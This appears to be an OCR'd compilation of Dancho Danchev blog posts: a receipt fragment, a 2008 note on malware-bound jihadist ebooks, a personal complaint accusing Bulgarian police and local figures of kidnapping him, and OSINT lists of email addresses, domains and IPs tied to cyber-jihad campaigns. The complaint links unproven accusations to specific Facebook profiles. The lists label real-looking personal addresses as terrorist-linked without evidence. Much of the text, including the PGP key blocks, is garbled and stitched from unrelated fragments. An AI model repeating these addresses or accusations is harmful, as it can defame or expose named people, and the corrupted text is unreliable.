Unit-123.org 


BY DANCHO DANCHEV 
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porn-the .net /flo/84660854/1/ &id=1219 
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Transaction Sent ‘Transaction Processing Money Arrived 


Track a Transfer Print Summary 


Current Status: The money transfer is ready to be picked up at an Agent 
location in your Receivers area. 


Service: Money in Minutes 


Tracking “XAKEB RD, ca rd i n g .WS 


Date Sent’ 22-11-2015 
Sent To: Pakistan 
Amount Sent: 1220.00 Canadian Dollar 
Amount Received: 124969.11 Pakistan Rupee 


Currency Excnend® Exchange Rate of 1 Canadian Dollar = 1024336926 Pakistan Rupee. @ 
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4.6.16 Backdoording Cyber Jihadist Ebooks for Surveillance Purposes 
(2008-06-25 23:11) 
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It appears that cyber jihadists are striking back at the academic and intelligence community, 
by binding their propaganda Ebooks with malware, then distributing them across different 
forums, thanks to a recently analyzed Ebook entitled " The Al-Qaeda network’s timely entrance 
in Palestine " distributed by the Global Islamic Media Front - hat tip to [1]Warintel. 


If it were posted by a newly joined forum member, it would have logically raises the 
suspicion that it’s in fact intelligence agencies spreading malware infected Ebooks around 
cyber jihadist forums, but it’s since this one in particular is being distributed by what looks 
like a hardcore cyber jihadist, it brings the discussion to a whole new level. 


What are they trying to achive? Abuse the already established trust of their readers 
and cyber jihadist supporters in order to snoop on their Internet activities, or it’s the academic 
and intelligence community they are trying to monitor? In times when botnets can be rented 
and created on demand, they seem to be more interested in infecting their enemies. Moreover, 
| suspect that prior to the forum posting, private messages and emails were automatically 
sent to notify members whose number of posts at the forum greate outpace those of average 
observers, perhaps the target in such an attack. 


The malware is detected by 9 out of 33 antivirus scanners as Trojan.Midgare.gra . Con- 
sider reading a previous post on "[2]Terror on the Internet - Conflict of Interest" as well as 
through the related posts summarizing all the cyber jihadist research I’ve conducted so far. 


1. http://warintel. blogspot .com/2008/06/al-qaeda-hacking-members. htm 


2. http://ddanchev.blogspot .com/2008/03/terror-on-internet-conflict-of-interest.htm 
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tchukopchu@tutanota.com 
dokulus@tutanota.com 
pashmak@tutanota.com 
blackmax@tutanota.com 
lizscudata@tutanota.com 
clifieb@tutanota.com 
dryidik@tutanota.com 
ammon0503@tutanota.com 
judgemebackup@tutanota.com 
yourfiles1@tutanota.com 
ARASUF@tutanota.com 
ykup@tutanota.com 
bhatmaker@tutanota.com 
buratino2@tutanota.com 
ticketbit@tutanota.com 
Stay tuned! 


1. https://ddanchev.blogspot.com/2020/11/exposing-protonmail-and-tutanotas html 


17.6 June 


17.6.1 Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic 
of Bulgaria - Part Four (2021-06-09 02:09) 


[1] 
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Dear friends. 


| never really had the chance to elaborate or actually explain what really took place with me in 
2010 when | was what appears to be illegally arrested using a stolen ID and a molestion and 
home robbery attempt courtesy of local police officers from Troyan Police where Troyan is my 
home town including a kidnapping attempt where | was taken into a car by the same people - 
one of them is the mayor of a village called Debnevo and the other two are running local pizza 
businesses and are actually involved with my town’s administration as advisers. It appears that 
| was then drugged and sedated without my knowledge for a period of 5 years where under a 
physical violence pressure I’ve lost approximately $85,000 due to physical harassment without 
no legal action on behalf of my country or any other country involved which leaves me with 
home molestation kidnapping attempt and a physical robbery attempt by police officers from 
the town of Troyan with no legal action besides a DANS agent visit who asked me to attend a 
doctor session and actually advised me to take a pension. The same people that robbed and 
kidnapped me and basically ruined my money and well-being are currently still supposed to 
be working in the local police department with no legal action on behalf of my country or any 
other country involved leaving me with no money and a steady flow of loans which | try to take 
care of by working on a part-time or contractor basis. 


Sample Facebook profile IDs of the people responsible for my illegal kidnapping illegal arrest 
home molestation and the stealing of my personal ID from my place and holding me hostage 
for a period of couple of months an injecting me on a daily basis: 
https://www.facebook.com/profile.php?id=100030506870037 
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https://www.facebook.com/profile.php?id=100005932519460 


Primary points of contacts in case someone is worried about well-being and whereabouts in 
this case should be: 


Email: dans@dans.bg 

Telefon za korupcig na slujiteli na MVR - 02 / 982 22 22 
GDBOP - Signal za korupciq i izpirane na pari - gdbop@mvr.bg 
Nachalnik RPU Troyan - rutr.lo@mvr.bg 

Troyan Police - Email: police _troyan@abv.bg 

Troyan Hospital - Email: mbal troyan@abv.bg 

Lovech Psychiatry Clinic - Email: dpblovech@abv.bg 

Troyan Municipality - Email: mail@troyan.bg 

Related posts: 


[2]Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of Bulgaria - 
Part Three 


[3]Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of Bulgaria - 
Part Two 


[4]How | Got Robbed and Beaten and Illegally Arrested by a Local Troyan Gang in Bulgaria? 


[5]Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of Bulgaria 


1, fittps://4. bp. blogspot .con/~ Inka 5H52U/YL6OuvDzL/AAAAAAAANSE/ qxPRvbP6iSQOX_968vq¥¥TaSCLZ_VLaQCL<BGASYRG 
2, https: //adanchev blogspot. con/2021/08/dancho-danchevs-disappearance- 2010, hal 

3, https: //adanchev blogspot. con/202i /02/danche-dancheve~disappearance-2010. nea 

4, https://adanchev. blogspot. con/2020/12/now-i- got-robbed-and-beaten-and. htm 

5, https: //adanchev blogspot. con/2019/11/danche-dancheve-disappearance-2010. nt 


17.6.2 Exposing a Currently Active Portfolio of GIMF Cyber Jihad Related Email Ad- 
dresses - An OSINT Analysis (2021-06-13 01:43) 


[1] 
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Dear blog readers, 


I’ve decided to share a recently obtained using Technical Collection portfolio of email addresses 
known to have been involved in various cyber jihad campaigns online including to possess a 
direct involvement with the GIMF (Global Islamic Media Front) including the Ekhlaas Islamic 
Network including the actual registrations of cyber jihad themed domains for the purpose of 
assisting U.S Law Enforcement and the U.S Intelligence Community on its way to track down 
and monitor the cybercriminals behind these campaigns. 


Sample portfolio of currently active email addresses known to have been involved in cyber 
jihad campaigns online: 


inscont@yahoo.com 
pirezine@yahoo.com 

inspirel lmalahem@gmail.com 
inspire2magazine@yahoo.com 
inspire22malahem@fastmail.net 
inspire Lmagazine@hotmail.com 
inspirel Ilmalahem@gmail.com 
inspire22malahem@fastmail.net 
inspire2magazine@yahoo.com 
convoyofmartyrs@gmail.com 


convoyofmartyrs@yahoo.com 
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convoyofmartyrs@hotmail.com 

dabiq-is@0x300.com 

dabiq-is@india.com 

dabiq-is@yandex.com 

s.mlahem@gmail.com 

sada_malahem@maktoob.com 

s.mlahem@gmail.com 

almlahem@gmail.com 

azan23452@yahoo.com 

arsalan8542@gmail.com 

azan _2013@mail.ru 

azan 98762@yahoo.com 

Sample URL known to have been involved in the campaign: 
hxxp://gimfmedia.com - 203.211.145.203; 111.90.148.5 
Related domains known to have participated in the campaign: 
hxxp://dozygroup.com 

hxxp://forums.gimfmedia.com 

hxxp://gimfmedia.com 

hxxp://bravoteknindo.com 

hxxp://bestcominfo.com 

Related IPs known to have participated in the campaign: 
159.100.176.171 

203.211.145.203 

203.211.145.31 

151.80.200.124 

Sample Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public PGP Keys: 
#—Begin Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
pyHAv2KZ9gRLgLtwb4spOhOXb1cFjsZ3tcbo6CnuUT+wOy74p7 
uZnEbshDmLZFXVSe5RntWOI5m86+rdl2HRcC401JZlgxsmMI51 
KaSLmepn6dEINoWTbVAjtsFERXcjtEOYkKZvhQN3JCIAINTS6Xk 
1I8zxl4U7VU2LoZzJw4QEdRcWutnZ3yCS5VxLnTOUtlawwZKd3C 
HFLrkzmhEr5G1Nxe6+OlU6ZI8aomCOfwFkYLao28RLDL8vGag7 
JFbxSXy7f6LOBrCCO8Mu4IfUpUGOZCGP4RXJfRLTEEMH9SFF/C 
ZEwJEeWm902fo2yU/4nXMZIxN441iVzvIGTPbuPxy2f0+p/NMV 
X+orew/pvkoofnwOlxFhVxYU99eix HBEgEQCAUusw7FVGHbpRJg 
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gULtulLCd9VLAZRFvhyUk+IHPpsoedrQLvSoHIVC/Ga7ZIMJYX 
2PNuYqbaf]pUZAqU1Ghq/YKIICeClbLuWSaDErp+K3kMz0Om6Ay 
qCFcrv6gcxMqZHPIj9VJ3ZS97vMqgux3VeZKRG1TCV+Jm1whg8 
/320nzZILNtYBWLvWavpum 

#—End Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
#—Begin Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
pyHAvqTp3Mxye8vscUGr+92wvuhK6eyL9OQBseQ4gsX3Fcnr2xO 
ERLLpA5w-+rjkZENPNR61XfOfYNPSRyUpDXamNXzfDVF4upScx8 
ufGGgxZeTaz6m3kwS6A87nayVakI83NK7exp+Ugc1Jm1Nxq3lq 

8suJvXA/ft3 KgsHyeumaORsSbM382mJ3PTXt3Z88La49Kw3hYL5 
6IYP7G4/FS9IAxn2mzKfPKay2tcKKpdfDK+RSNgDhbWaCdbjw5 
5kVMcoRS5kKnEN3IqD/cd8WM7XvmkbF4+gmuqKC5NPtz5/bNPIMS 
QncdyFQIHU7IKILJINbvpx/XZYzrRFRFHgi+kOX8edDthD5+cW 
dCvOWQw3IMbn3ikCj/KasLe9e9IARPGBKqz9ubkwcSZntmB+9gr 
c5hRRb+/SembIh6RBNucNYd220GnenmBenM20/sRzkHhgOR7Oi 
1zdR5Qn8CcUxKzO20ebPaTOxpFtdizzvBciLjyE9mV45M4Qspf 
56QSWTDFinhNZGDW3WWkRp4fCsV2Mr8M9wvNHan+2QISsdBj 

#—End Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
#—Begin Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
pyHY2q3DSBasVBCwh13bFtgFu+t4ioqgKkBmxXxYOy96mMp5RKO7C 
u2zLT87G7jzSw3X5UZg87ew9Z60a4X/XShrNuqE6dLiol3c84d 
PMDOyPiA4wSNN/btukSvnw6égdjygH+ImO0SxJmnOH+Sxjd9piZZ 
VTxSsj20/KQbhzPCj/QacCZDW9sCY2iybKnfOpOlIU2WNr+0264 
Sr36krjbxZ80j8+G7QJUMqOw0m/e9d/uNIFRJSQcCWhHErUBO+ 
xDBCm4g1zoFr3Rc4d9hRoFOWUdGEyx!IX95L8V3A8LCA1F+HJ+4 
cLPeujgzgqyhqPNrO+FS2nqUV11QRJI/1Ljfa/FTYZQydwDVSI 
VoXKxakKljK4eqd!+9MJNjQzax/gbrw2wsuVukEooyY Lhtj2b5ex 
esM46n5+ugixB18AM6DMDtbyLhciiGyw685/MYfiwYZXowfvdV 
Dkrj/ybql8bQgzq//QzXkrbVqCwn9d4J2wTktbiWoOu+zdg07B 
joWCjr+nfStEo/Qo+Hx3BDu3VhIptj/aAXxPVhgLg9q3Hur8In 

XJKIlvi4fUFOA== 

#—End Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
#—Begin Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
pyHAvNeRKLqFHJG+LA5hZfEYISJCYB6zeKc5Bq1F5EwjBujytO 
9cMJHOSdEv98hVymwhLsOgLzigJHPTfxA0Ani7EWNaZx1lhLaRm 
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/ABMHErTQ6hZFuBiqnZ1WCEf5NbM 7r8ikcOJEkryxIT8jehglo 
C2e0/uG35qlcmRudP4eanvkKfikQnojeEz3D1bD3iIKWZNx7HBhL 
2z6YOtfG8sFb8AyjXv8SEHaRHGO3 7uwID8UNguxIiRwanb5yEYP 
bD1bc4XFfy8JJgRNY8xWqAOwDZAciQ9MykgLZDoxxk/fBxm+Ni 
X+VRQsxDk9BDg60Yw4hcgghulyWItz6858NA9rl7Y2ki78bMZP 
JOHXAD3)J60iW9dKXYLE4mhwpe0C9iqfsDNhwepvawLOK8R8sZ} 
3MnIUAwm8hLjEX794qGPD2cPonp3IxICMddtQRSR3sSN23bjOLF 
/OOZhU9Shqv3k0rA4YfT3XoqLoeprxXucHzXFRXOCCQOdrnFQzG 
+49YV1YeTPpv7TtHvLoYxbsl31ieOPogM7/rKXvQRRZZFstkxA 

#—End Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
#—Begin Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
pyHAvx7yoSxCzgw3YCEMzjlHoKmarwjTzLz7N4mwdSAlq2shx1 
8cJAXtROJ+9UG2WUPvURuceRdiAFocDjZr9lbz4NQIhXP94laq 
IDbiIMEDBaCFzeQnWVxCtCsoLedigNIYZWrOdXIkuh65VhDv30 
iNDGFjQy/4Gbnmb2)hXaRIwFZI9bhXX90usc4jO}/j/QRj1ltHa 

oOn8wK300F XiH4TTmMQCQwxf6wxcBVxtINLF7ZCcqaEszDrAH9y 
1tBnb+6GulB/j2E/AbsFHXHQE8Kvay 1uDNjd80f+4jAh8vtM4T 
1LPwNtxtOvMt5liZLOC/DUwx9fRodW+aLVI7ICsUIpTFBdV9KKF 
vs8p7C5ECOpP13XFmrdM+bYOYQUL3SqWjH3AApGHWuHmlel5ZC 
LDVoZlySQOBQDkFbX0zduO07QENpWXpbfGS8kv7gNq343cHo08 
IpPVWIiq9wcz95wjWGIIQIp1ps2jfinCyfOZWD+ZmQdKjvnQgtfc 
MfKv6LH3VLTQctKV8IlIOmn5pel8trs 7bgwYCee05MPne83miEW 
oLZs9EsIimn6ygMfdwunaY= 

#—End Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
#—Begin Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
pyHAv2DKkqJi4 lw6bxtfQNfoAT99CCWkKEP8G//amQx5ZDrgg50 
cZJrdXdBDICnfVsS1iB80CzGs/3hWzhTROD9a+WILhANJd2ijxgZ 
3qYyYPQ/Bc3bkccFM6dGYIG7ISMGOvKbD2BO1I5QgcnWgtYL+o 
xDbhbGAq2hkFRkpzNuHPn43erjxox6i0RiVs5cE71pr65jOvSa 
Fa4Xlp+EySGBHnWw4rjjTDQFLfjsjt+ovKoBQIMBv1lia7KSatFA 
Ses7VxEPEO0tq3S2cw34Q9+DauVPV2C17XhWIwNwrmzTpZwNB3a 
/exu8lJsKiN4vp6h2ielHmc8AtRXhG3i/TrE2FjesA4RSguR6r 
OvmYhdaqCABSISHcO6tRvg31nbPS+83SAIxYNAdx22ewYLatvH 
/VWLcCB48Zr904cY738mP1/PTnVn4RaLMLqem+xLObyGs002xyD 
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4.6.17 Right Wing Israeli Hackers Deface Hamas’s Site (2008-06-26 20:14) 
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Compared to historical hacktivism tensions between different nations, [1]lsraeli and Pales- 
tinian hacktivists seem to be most sensitive to "virtual fire exchange" like this one, and 
consequently, just like in real-life, always look and find for an excuse to engage in a conflict. 
[2]lsraeli hackers penetrate Hamas website : 


" Israeli hackers boasted Thursday about breaking into the website of Izz al-Din al-Qassam, 
Hamas’ military wing, which now displays a white screen and words in Arabic announcing 
technical difficulties. The hacker group, which calls itself Fanat al-Radical (the fanatical 
radicals), also said that it broke into additional terror organizations’ sites and those of various 
leftist movements. In a Ynet interview, a group representative who refused to reveal his name 
said, “We searched for relevant sites with the criteria we look for, whether leftist or anti-Zionist, 
and looked for loopholes. Our emphasis was always on the al-Qassam site. "The criteria are 
defined as anti-Zionist or anti-Jewish sites that support or assist in harming Zionism and the 
existence of Israel as a Zionistic, Jewish state. " 


The message they left : 


"Hacked by XcxooXL and FENiX from Fanat Al Radical Greets: Sn4k3 Contact: 
Fanat.al.Radical@gmail.com " 
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Nmp93jXNmnOekzfdilckUaH/Dr8gAgegjurl gbo6EvKMKHxFkJp 
GkTV1QQVWAzLbkHcqiX/4WZRGMMgqDExgk3p+ yKIf2vv2PBPXtW 
vdKGW8yP4= 

#—End Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
#—Begin Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
pyHAfz5GBgpRcZaUAmoFA1+s98ZqPNqxSJ+WuF50)keJgoU5BV 
WHOIkKNQyxMkeP7PYfGOiyB1ItsNKXb+mY6AnQpP6B8kIGM/ZXp 
HAS1xHSjOZUVx/sOv/iYVRbh7jb4N10Hb+FtbWLK6UwWWAdGwrz 
XWCGeSIPjEJztNaGtZebYProzvT 3BDirfuHn3HcLTyQOEnSIQT 

NtupJ HEWUZQ7mjd0O0/8cZkOXccjyMDqTKH3LOMc5 7VTuhuOwaH 
4nEKpDgeqB+ssRo2jD4AW8bmvLfebPGNaJXdUScblyzwstL+Rv 
p8m8pqbsRg++0/AkKdOn73Wsj6fK67upT5bqeuVH7vtv3ZNOvb 
3puGniDKffNalo+qqDZEpxDqmWluTI1QiADIWd6lsrCWR8iYm+ 
aiNyCR7wu/qD2LkOGauvUr9B23yU5sR17U+o0yXOR9MQrqGkade 
6FRqnFevBeqKaqrSy7Erxz9xi/yTLHtQlycsSnDh1I+nLoSB+6F 
X9DYePUtzlTvck5N70xH5QKHQuUO+F3J+DIPnJ6XVNQ== 

#—End Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
#—Begin Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
pyHAf85N2opm9LVrWUdmXs300QWNLPAm7maqgQhpXH3ubZyop3S 
OOfW6AKdmcKq6YWGEAcVS6TpyS4xdFSp+L8Dq4KRcLmmWat-+fs 
aqpnCm]J6306fAX6UY3bmpLZtm4ap+G7vHTevGNbf76iqecOrét 
uhJXII7X4Vspu2Rrh/h/Ow40TnU6vboih9Y/iB1M3YeZ1p8ccf 
967DBbQyax8jsxn3mn4C5LWOINGLIXVr9ghXttkk6Tc3aRtvQax 
enj3NpMUyBbWo0AdOo080mp7kbdny5J5WviL8eJeKUCIQZ17Yhu 
QVQUZp07oFIOtRT6UIIORXXQ)J9vfOXwcOuoOcAjMTpbA/igt9S 
HIJOt9nzDasLlaKO3yOVKNW5kz9LoermikK2uLO/mAqVzZowXMTo 
INNgPOWXF9OKwMuTtutVj9NcK3JYFNiDNerPNbOrCcG2DwegyP7M 
LntFIlVHADZDOs5bOvDGOAIIOMFO1e2bKLSwilde+N6NtcZjmi7o 
HiW8NWOpuZI3FxXEG+6ajl/psXxMQYRx5jg7kiCUVe1lExEyexUc 
8fDFDVGng+/w== 

#—End Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
#—Begin Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
pyHY2z3PNDNO08lj+bEH75bjf1lWoiJNaAEn2jlLOHgCy7HMF8 
8+5dDI4SQ+WHTJZ913f4s4i7Itxasg9l+3VKA3RHXXSSVkmOYy 
TTd19KweZOA9hgBbYI5b6gBiUB]4yxGnEg5i4QhvZ/xDiIRMTWQ 
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1H9/hXgxLcuegJGq017a7ftQlQQuXizqnTjAZDM+aLTALCuNIN 
fmU4NeOEFDFBuA42ZNoluCU0OucNun1fpi45rJSW5/6KiJts0z4 
OwJFYquXBVXwSv7pCkLq8e+d2BX61ZNLBIWV6SckHOrCDibgXf 
00+jWp26r18nF5EJyNkKBZ6LZBiYe4D16AyYvcmT1U3nsVcvr+F 
ORPJ76Zyj9B6JPDbMMq3+i4RHfwvuNDdqVxGwgOoohE/IXK2li 
CJyRIITb9gY/bw0aSfnde7dzg200xw3W+PyoBPcVcCOPWWZSHAU 
arYESJHw6sCZRuiH2DJjCoJBWnYgY5rGByVmjTMMEVVrF8bREH 
ZrHtB1qJ+PLU/FB4rogidHVfqDRdjuvxwFcPLTIYElg== 

#—End Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
#—Begin Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
pyHAvilkCUPgVLbPZZOsR8nnl9kIGXy56hvdj833yJqxfK+18/ 
ru5OFSf1Z4M2DPuXYlsi+hiz41uK81NXte0+nDIqFi8bhoq2Md 
FKOWLIt}vMgwrikaz7dUh1LUMyR22I0jI/HtKNhLjdVaBfinkTD 
hpvWkajkKfjkXgl63QfPInFOIKXMsaEqKoqvDPRflXuJ+DDO5Vb 
SNWSHHUUbEPu0OzdzoxdxCjBLocG/9D5fhHMOW32+eco6X1LhSn 
BII42PF3fCH+qpyTVU2Kh30dN9Yd2Qeu7JfkeBcSNIA/ilp7dY 
8a09XD4QRPWseUVUN3UIj4LIVgbLIsDMamXJfDoVkAfxaS+HXa 
8FKf/AgNu7SG4xzHCPysMpHSLwafdlTGOtKnFUYOO+NDHb/e80 
BiIR9CgUMG/rIL4adrpVCNIxWSSnjmk7bjJ9gAjJIADNqvQsrER9U 
Dp54gw8wK2Iv+Xu9Cj8+u0Re8PUBLSDaY6fqNDvHjJyYLBsh6So 
WYIV5ALCIh8qYJdINiW6HNx5vPxjoUBVns1pHKwxEqDp6l7p 

#—End Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
—Begin Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— # 
pyHYG3TcxWEosxXvJGW6YDxDzklO+g1FujkzVgvHGyw7F1MNZve 
emXTdC8D+0x7rDxOJsvNOsVc3xnHXDoTjHKgAn!|+wv404Ub9Zq 
zCtz/lOSetal5KLmxbObopYVizzlixhcBQ2WFtOIDvCnVdt6g? 
brOQxBkiDmMKRsxXIzYOZDnDsAd79TmyKUb9XgQvREM8YdNZP??? 
WLQ359]VAcgFX4EzzlkACmC2BNir0a+wjyxqCa8ET 63qfHsZut 
vVMo7iuhKD5FPQ2rBffUyTmWyh7ixhHjZ/YHkFXaHoOGvq6Wsic 
ejmY2jKMim3SPJqRRd5RoU+x8D7sHXhuKbaLAVboHITtGrj3G? 
I+K9WlereyKgZHRDv9ZWYI7POrCSUBJpCLO+ali8pyhfKz4Y2? 
jhJ89nES6olgC+7pVIiTwf94iCKQAi/dIR270v4z+/utNMVqPMH 
fNZv8yFdfSnJ5uxXAMA4+8wJTKDNAKKYMHgoaTgppOlshTWhQL? 
CB8f8sRoAvgKGxQfzB70DBOLpFYIgPpuxv34rB9d+0pk625SI? 
Du9neWYf+DRIqUmMQPdBKh1OUWIOKAEfcIPOxdvtGZDNyDL66KZ 
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==UQ 

—End Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
#—Begin Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
pyHAfz5GBgpRcZaUAmoFA1+s98ZqPNqxSJ+WuF50)keJgoU5BV 
WHOIkKNQyxMkeP7PYfGOiyB1ItsNKXb+mY6AnQpP6B8kIGM/ZXp 
HAS1xHSjOZUVx/sOv/iYVRbh7jb4N10Hb+FtbWLK6UwWWAdGwrz 
XWCGe5IPjEJztNaGtZebYProzvT 3BDirfuHn3HcLTyQOEnSIQT 

NtupJ HEWUZQ7mjdO0/8cZkOXccjyMDqTKH3LOMc5 7VTuhuOwaH 
4nEKpDgeqB+ssRo2jD4AW8bmvLfebPGNaJXdUScblyzwstL+Rv 
p8m8pqbsRg++0/AkKdOn73Wsj6fK67upT5bqeuVH7vtv3ZNOvb 
3puGniDKffNalo+qqDZEpxDqmWluTI1LQiADIWd6lsrCWR8iYm+ 
aiNyCR7wu/qD2LkOGauvUr9B23yU5sR17U+oyxXOR9MQrqGkade 
6FRqnFevBeqKaqrSy7Erxz9xi/yTLHtQlycsSnDh1I+nLoSB+6F 
X9DYePUtzITvck5N70xH5QKHQuO+F3)J+DIPnJ6XVNQ== 

#—End Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
#—Begin Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
pyHY2z0roQVPUZpjVclzxOmcy8PfdEvnB19e/Jl4GJwUVsmzmS 
LQHVN+tOkHgzZM3cxhlox2j/RHGNDEJpUyB4HaleolXtuEPOGu 
nJOEkfB1lyS8pIBIqg4e6GcM5cZaxK4YP80bv5AIzYJqXQEi+6q 
6ePKVLR/2qHAqxEWclgNu8Cvvut+ZAktPVP88tl/TigbdfIK7N 
/WacpcYuqrdc464MgeA7MvnfWeSNc019Geng6Pkw/NIRCAiJRo 
saj3U0G8q+m9UFIzYrnaPrMG1q+gnQ/lYv+ 7Mn+kZXoFDh284! 
WhAmIJZIZQ+hX49KVAjFpQo+ajzvnaHZi59md9n/jsFBHjljo 
6ghruylqvOENp2IMyLD75K+uUNWRupmNV1dk9fxzmNfYWr/yYmd 
eHMhbf1Fz50dPR28suk/Ogyr9FNCKgEmvQabLtta8EnPSchhPN 
TIrxxXoDxEZyMYuMyJDcF3QKu/o3NukKRRUQASv3F2fMggegdZP 
CKUvV3M4tOpOUI5HsM4d7pTXxXlkyrr4hfBtChje5ID7bG3aCumd 
T8IdBCajtgDxMBasOyyhdevw== 

#—End Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
#—Begin Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
pyHY2quLz4yP4gSmbEAIxiQNwxMz/VcQ/m9L9nSLWjor6xtlYZ 
vtfROSOnCSfRPUhfF+VUW/2argLL9+JzwtVGic+hxYNUXxzzzKq 
3VyDxRxz3xGww1RM8MIEPPBRP8eLs9p5EE3WPQGOPI/x/jZNP+ 
ens7edhl0cquRycUojilQ/46iPKWYQVIMWF9YpxjJJ2kpytGrOL 
1tppESDbomD+BPzjWrcu2ndjaGRns4wMLkD4WtVUAH3TQxK6IW 
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WRR31MbQJK6NPTWKdnbX61dc95PAd0bn21H6cZz+5bEkvPiezB 
AckfkzfmBDBdv/a4Ry+G1rsNf0aGspbINdBjmUOSCLOE7VjY55 
SM6RV/Cv/HezxXTE43HAIqT g4i49YESsLeazxj 70oDu+e4i+fMzB 
ncXgYYSXN1FeUlyL5nPugJT0+oydkt/crALYfG6wCKaqri8Lshg 
iw+uGVfqgNgwUbq8o0nwRSxAbjwFFCKICBAPoTmgfl7Hex/x+2wg 
J2AC7p2qgXWm98dV54cWE2XYX8nZA1LgkK9G5cYGC4ZofxDTEnCDH 
wnwZ12AA== 

#—End Al-Ekhlaas Network ASRAR El Moujahedeen V2.0 Public Key 2048 bit— 
Stay tuned! 


1. https://1.bp. blogspot .com/-sEg_hm4Sk00/YMA891q1DcI/AAAAAAAANSU/vo4c- gydarEU37CewIQQSh5Z1Na3yQ4QACLcBGASYHQ 
s553/Misc_01.jpg 


17.6.3 Exposing a Currently Active Portfolio of Cyber Jihad Related Email Addresses 
- An OSINT Analysis (2021-06-13 17:53) 
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Dear blog readers, 


This is Dancho and I’ve decided to share with everyone a currently active list of high-profile 
cyber jihad domain and campaign registration email addresses which | obtained using a variety 
of means where the ultimate goal would be to assist U.S Law Enforcement and the U.S Intel- 
ligence Community on its way to track down and prosecute the cybercriminals behind these 
campaigns. 


Sample currently active email addresses known to have been involved in cyber jihad domain 
registrations and current and ongoing cyber jihad campaigns include: 


yunding5568@163.com 

redaksi _si@yahoo.com 
cancnebut@gmail.com 
tbg17888@gmail.com 
neharikarai@outlook.com 
xpj09166@gmail.com 
ahmed.alqassam@gmail.com 
abumos3b33@hotmail.com 
iali3g@gmail.com 
tevhididavetcom@gmail.com 
zayizef@gmail.com 
kinyongofl2@gmail.com 
jo9277547316@gmail.com 
kokludegisimmedya@gmail.com 
sitenevic@gmail.com 
NAMEMONITORS34@OUTLOOK.COM 
ahmed.alqassam@gmail.com 
johnlassandro@hotmail.com 
kokludegisimmedya@gmail.com 
3422926751@qq.com 
A4dminhizb@gmail.com 
tkaydesigns@hotmail.co.uk 
turkhackteamiletisim@gmail.com 
VANILLAHOLDINGS@GMAIL.COM 
doenfahri@gmail.com 
bestselection@gmail.com 


hostdem@gmail.com 
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kandaharimama@gmail.com 
DOENFAHRI@GMAIL.COM 
islamdinl@nasimke.ru 
salammedia2011@yahoo.com 
awad@zadgroup.net 
domainmanagers@outlook.com 
Sarah@kcicom.com 
txgals5O@aol.com 
cdir@cdlr.net 
aktivera@flighton.se 
5292086@qq.com 
adilmadani@yahoo.com 
kinyongofl2@gmail.com 
shutdown2022@gmail.com 
FURAAT4@HOTMAIL.COM 
khelafa2000@yahoo.com 
support@ghaaly.com 
love@qgiaomi.com 
yboss455@yahoo.co.jp 
akuatekbilisim@gmail.com 
samirnet2@gmail.com 
keywordacquisitions@gmail.com 
alkantar@thisiscyberia.com 
forgetmenot1343@yahoo.com 
hosting.dedearif@gmail.com 
kevin.cyber.base@gmail.com 
whoisprotectionservice@gmail.com 
koool123@live.co.uk 
DAKHEEL123@GMAIL.COM 
2085553878@qq.com 
ishaq@islamicsupremecouncil.org 
VD@NYM.HUSH.COM 
jo9277547316@gmail.com 
RCASPER76@YAHOO.COM 
darultavhid@mail.md 
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kamkashem@gmail.com 
brett.evans@icloud.com 
tevhiddergisi@gmail.com 
yunding5568@163.com 
bluetextmama@gmail.com 
alfetn2004@gmail.com 
akuedris@gmail.com 
money _detailsiai@yahoo.com 
yusufestes@msn.com 
fkummah@hotmail.co.uk 
janeverno@gmail.com 
vwinlucky@gmail.com 
milen.radumilo@gmail.com 
Zo0000m2025@gmail.com 
redaksi _si@yahoo.com 
abdullah.fahed@gmail.com 
abdvvv@gmail.com 
tevhididavetcom@gmail.com 
2628342@gmail.com 
iraqipanet88@gmail.com 
muhammadhurayra@gmail.com 
aulia_Suwandi@yahoo.com 
kilickaya.i@gmail.com 
tbg17888@gmail.com 
kenta.yano831@gmail.com 
abine.mariyah@yahoo.com 
mailusamah@gmail.com 
fad.lee@hotmail.com 
wardak14794@yahoo.com 
iali3g@gmail.com 
info@cyberkov.com 
rk2387927@mail.com 
domkeeper777@gmail.com 
RUSELBIEV@GMAIL.COM 


intercostitd@gmail.com 
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khamenai@hotmail.com 
rk2387927@gmail.com 

jim _7788@tom.com 
